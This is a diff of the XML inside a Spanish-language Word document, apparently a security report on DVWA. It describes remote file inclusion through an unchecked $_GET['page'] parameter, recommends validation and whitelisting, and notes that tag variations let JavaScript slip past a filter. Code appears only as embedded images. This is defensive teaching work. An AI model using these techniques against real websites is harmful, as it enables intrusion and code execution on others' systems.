-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>El uso de $_GET['page'] directamente en la inclusión de archivos</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>permite a un atacante acceder a archivos que no deberían ser accesibles desde fuera del sitio web.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="29"/>
-        </w:numPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:outlineLvl w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Un atacante puede incluir un archivo remoto que contiene código PHP malicioso, el cual, se ejecutará en el contexto de tu sitio web</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:outlineLvl w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">3.2.2.- </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Recomendaciones</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="30"/>
-        </w:numPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Validación y saneamiento de la entrada: Antes de incluir un archivo, asegúrate de que la entrada sea válida y no contenga patrones malintencionados</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, como se ha comentado anteriormente </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>(listas</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> blancas, inclusión de comandos prohibidos, manejo de </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>errores.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="30"/>
-        </w:numPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Evitar el uso de </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>_</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>GET</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>o</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>_POST directamente</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> y </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>crea</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>r</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> una variable intermedia</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, donde se </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>aplique</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> medidas de </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>validación</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> y saneamientos necesarios antes de incluir el archivo</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>, como, por ejemplo:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
           <w:noProof/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49EB20B2" wp14:editId="4397232C">
-            <wp:extent cx="5185802" cy="3125972"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="333F7C74" wp14:editId="0EA9E2B4">
+            <wp:extent cx="5399330" cy="2176818"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="1467184625" name="Imagen 1"/>
+            <wp:docPr id="1796549228" name="Imagen 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -6109,7 +5070,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="1467184625" name=""/>
+                    <pic:cNvPr id="1796549228" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -6121,7 +5082,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5234911" cy="3155575"/>
+                      <a:ext cx="5438555" cy="2192632"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -6136,139 +5097,51 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Prrafodelista"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="31"/>
-        </w:numPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Como se puede observar, se crea una función que sanea y valida los caracteres antes de llegar a la función de asignación de la variable </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:i/>
-          <w:iCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>$page</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>.</w:t>
+        <w:ind w:firstLine="708"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Ahora, si ejecutamos el código java script usando variaciones en el etiquetado, observamos, que la medida de protección es salvada, ejecutándose el código malicioso e incorporándose al código de la aplicación web.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">3.2.3.- </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Ejemplo de mejora del código para evitar RFI</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
           <w:noProof/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B27FF68" wp14:editId="04111A1A">
-            <wp:extent cx="5356225" cy="2838893"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="1294990956" name="Imagen 1"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AB0B6FD" wp14:editId="44C69E5F">
+            <wp:extent cx="5396983" cy="1767385"/>
+            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
+            <wp:docPr id="275253501" name="Imagen 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -6276,7 +5149,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="1294990956" name=""/>
+                    <pic:cNvPr id="275253501" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -6288,7 +5161,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5393314" cy="2858551"/>
+                      <a:ext cx="5491073" cy="1798197"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -6303,101 +5176,28 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>3.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>3</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Ejemplo de Código extraído de DVWA, de </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t xml:space="preserve">NIVEL </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>MEDIO</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
           <w:noProof/>
